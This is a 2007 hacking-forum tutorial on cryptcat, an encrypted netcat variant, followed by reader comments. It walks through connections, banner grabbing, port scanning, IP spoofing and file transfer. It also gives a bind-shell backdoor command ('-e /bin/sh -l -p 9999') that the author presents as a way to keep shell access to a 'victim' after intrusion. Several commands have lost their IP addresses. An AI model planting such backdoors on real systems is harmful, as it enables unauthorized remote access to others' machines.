Follow us on Twitter!
Don't judge the unknown - Grindordie
Saturday, September 23, 2017
 Need Help?
Members Online
Total Online: 49
Guests Online: 49
Members Online: 0

Registered Members: 102008
Newest Member: manraydark
Latest Articles

Cryptcat: Advanced Usage

Arrow Image Advanced Usage of the encrypt3d SwiSS army K.nife!

Cryptcat: Advanced Usage

++||||||> CRYPTCAT <|||||||||++

It is, basically, netcat with encryption (twofish) turned ON. So instead of having communications sent/received in clear text, you have it encrypted in twofish... So it doesn\'t get sniffed!

This tool is often referred to as the \"TCP/IP Swiss Army Knife\", because of its ability to establish various connections across networks.

So, if you\'ve ever used netcat, then it should be easy for you to use cryptcat. The Syntax for using command line is the same.

Let\'s start by explaining the basic usage of it, by examples, then move on to m0re compleX stuff:

First, to establish a connection between two machines, we\'d go about this by:

-= making machine #1 (local/victim) listen on a port (with an IP of =-

>$ crypcat -l -p 3333

-= Making machine #2 (remote/attacker) establish connection (from =-

>$ cryptcat 3333

You can also use cryptcat for banner grabbing, ie. for SNMTP servers:

>$ cryptcat 25
220 ESMTP Sendmail 8.10.2+Sun/8.10.2; Sun
19 Feb 2007 12:25:02 -0500 (EST)

this should connect you to the SNMTP server, and output the server\'s Name and Version.


Can also use cryptcat as a script to banner grab, say on an HTTP server, as such:

>$ cryptcat hostname 80 < get_reqst.txt

set get_reqst.txt to contain the following script:


(don\'t actually type in [ENTER], rather, just press it twice) duh!.

OR --- try (from the SHELL):

>$ echo -e \"GET HTTP/1.0nn\" | cryptcat –w 5 80


Say, instead of using a ROOTKIT after intruding on a computer, you can simply use cryptcat to get a SHELL every time you connect to a port you specify for the local machine to listen onto with cryptcat. This is a simple backd00r. To do this, simply type on the local/victim machine:

>$ cryptcat -e /bin/sh -l -p 9999

(that\'s assuming the user is using UNIX)
Now, as the attacker, all you need to do is either connect from your machine (or locally) to the victim, then that should spawn a shell for j00.

>$ cryptcat 9999 -e /bin/sh


You can even make cryptcat act like a PORT SCANNER with:

>$ cryptcat -v -z 1-9999

this scans for ports 1 to 9999


Also, you can use it to sp00f your source IP Address:

>$ cryptcat -s

remember, the sp00fed IP address ( come before the remote IP address ( This causes the remote host to respond back to the sp00fed IP address. Don\'t start thinking of how malicious you can be with this!


Ah, yes, and one of my favourites... Transfering Files. To do this, simply, set a computer (not necessarily a victim) to host a file (take_me.txt):

>$ cryptcat -v -l -p 9999 < take_me.txt

Now, to get take_me.txt, all we do on the client is:

>$ cryptcat -v 9999 take_me.txt

Note: is still the server/victim.

And finally, you can use it for source-routing to connect to a port on a remote host:

>$ cryptcat -g 9999

Note: is gateway we\'re going through to connect to to port 9999

Man Page:

Hope you learned s0mething at least. Expect more! And ...

Always Remember!
1: Netfish is RIGHT.
2: If {you think Netfish is WRONG} then SLAP YOURSELF, and goto the FIRST POINT.


only_samuraion February 19 2007 - 14:44:48
yet another badass article by the netfish.... let noone say he doesnt contribute. .... lol netfish.... enjoyed the article tho.... :ninja:
HardHackzon February 19 2007 - 15:23:15
o.0 A little confused, next time explain the O/S, that it's unix, etc. Good job though.
nights_shadowon February 19 2007 - 17:52:03
Interesting, never even heard of cryptcat, good read.
-The_Flash-on February 19 2007 - 19:45:37
Keep up the great articles dude. Awesome to read something worthwhile
netfishon February 19 2007 - 23:35:21
@HardHackz ... no need to explain what OS it is for, it has ports to pretty much all the main ones comprising of, Windows NT, BSD and Linux. The syntax remains the same on all those platforms too.
end3ron February 21 2007 - 03:36:52
good article, nice info.
sleazoidon February 21 2007 - 03:51:14
nice work man!:happy:
sirus69on March 06 2007 - 08:15:05
waste of time
Post Comment


You must have completed the challenge Basic 1 and have 100 points or more, to be able to post.